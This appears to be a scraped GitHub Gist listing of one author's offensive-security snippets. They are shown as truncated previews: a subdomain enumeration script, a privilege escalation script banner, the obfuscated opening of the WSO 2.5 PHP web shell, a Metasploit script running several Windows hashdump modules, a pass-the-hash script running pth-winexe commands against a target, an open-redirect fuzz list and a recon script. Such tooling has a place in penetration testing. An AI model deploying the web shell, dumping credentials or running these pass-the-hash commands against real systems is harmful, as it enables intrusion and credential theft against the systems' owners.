xer0dayz 1N3
@1N3
1N3 / crt.sh
Last active February 5, 2024 15:29
A small bash script to gather all certificate sub-domains from crt.sh and save them to a file
#!/bin/bash
#
# crt.sh sub-domain check by 1N3@CrowdShield
# https://crowdshield.com
#
OKBLUE='\033[94m'
OKRED='\033[91m'
OKGREEN='\033[92m'
OKORANGE='\033[93m'
@1N3
1N3 / LinuxPrivEsc.sh
Created May 13, 2016 02:50
Linux Privilege Escalation Script by 1N3 @CrowdShield - https://crowdshield.com
#!/bin/sh
#
# `7MN. `7MF'
# __, MMN. M
#`7MM M YMb M pd""b.
# MM M `MN. M (O) `8b
# MM M `MM.M ,89
# MM M YMM ""Yb.
#.JMML..JML. YM 88
# (O) .M'
@1N3
1N3 / wso_2.5_shell.php
Last active April 24, 2023 15:13
WSO 2.5 Shell
<?php
if (isset ($_GET['lU$6AJp0aXFt0RyAynP9OnL7FlzQ']))
{
$a1="Fil";
$c1="#d";
$c2="f5";
$color = $c1.$c2;
$bs="esM";
$da="an";
$default_action = $a1.$bs.$da;
____
_________ / _/___ ___ _____
/ ___/ __ \ / // __ \/ _ \/ ___/
(__ ) / / // // /_/ / __/ /
/____/_/ /_/___/ .___/\___/_/
/_/
+ -- --=[http://crowdshield.com
@1N3
1N3 / metasploit-post-exploitation-script-for-windows.rc
Created February 3, 2016 12:22
Metasploit Post Exploitation Script For Windows
setg SESSION 1
use post/windows/gather/smart_hashdump
run
use post/windows/gather/credentials/domain_hashdump
run
use post/windows/gather/credentials/mcafee_vse_hashdump
run
use post/windows/gather/credentials/mssql_local_hashdump
run
use post/windows/gather/hashdump
#!/bin/bash
# + -- --=[Sn1per by 1N3@CrowdShield
# + -- --=[http://crowdshield.com
#
VER="4.4"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="/usr/share/sniper/plugins"
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
@1N3
1N3 / windows-post-exploitation.sh
Created February 3, 2016 12:18
A Windows post exploitation shell script
#!/bin/bash
TARGET=$1
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "systeminfo"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "whoami /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "ipconfig /all"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "netstat -ano"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net accounts"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net localgroup USERNAMEs"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net share"
pth-winexe -U DOMAIN/USERNAME%PASSWORD --system //$TARGET "net view"
@1N3
1N3 / gist:de48ab54edd831cb12fb
Created July 2, 2015 09:31
Open Redirect Fuzz List
http://google.com
//google.com
\\google.com
\/google.com
\/\/google.com
/\google.com
/\/\google.com
|/google.com
/%09/google.com
/google.com
@1N3
1N3 / reverse-engineering-wordpress-0day-exploit.txt
Last active September 26, 2020 19:46
Reverse Engineering a Critical Wordpress 0day Exploit
REVERSE ENGINEERING CRITICAL WORDPRESS 0day EXPLOIT
This past weekend, I noticed an interesting alert from my mod_security logs for a request being made to my Wordpress site. Although the request was unsuccessful, I decided to dig deeper to understand what this request was actually trying to do. After time, I've concluded that this is possibly a new 0day exploit attempt against Wordpress or a related Wordpress plugin (iThemes Security??). I'm still trying to uncover the exact flaw being exploited here so if anyone has any further details, feel free to contact me at 1N3@hushmail.com or twitter @CrowdShield.
ORIGINAL MOD-SECURITY REQUEST
==> /var/log/apache2/error.log <==
[Sat Aug 15 19:00:10 2015] [error] [client 46.148.18.226] ModSecurity: Warning.
@1N3
1N3 / Enumer8-v20150705
Created July 6, 2015 00:32
Enumer8 by 1N3 v20150705
#!/bin/bash
# Enumer8 by 1N3 v20150705
# http://crowdshield.com
#
TARGET="$1"
LHOST="192.168.1.132"
LOOT_DIR="/pentest/loot"
FINDSPLOIT_DIR="/pentest/findsploit"
KEY_PATH="/pentest/linux/ssh/dsa/1024"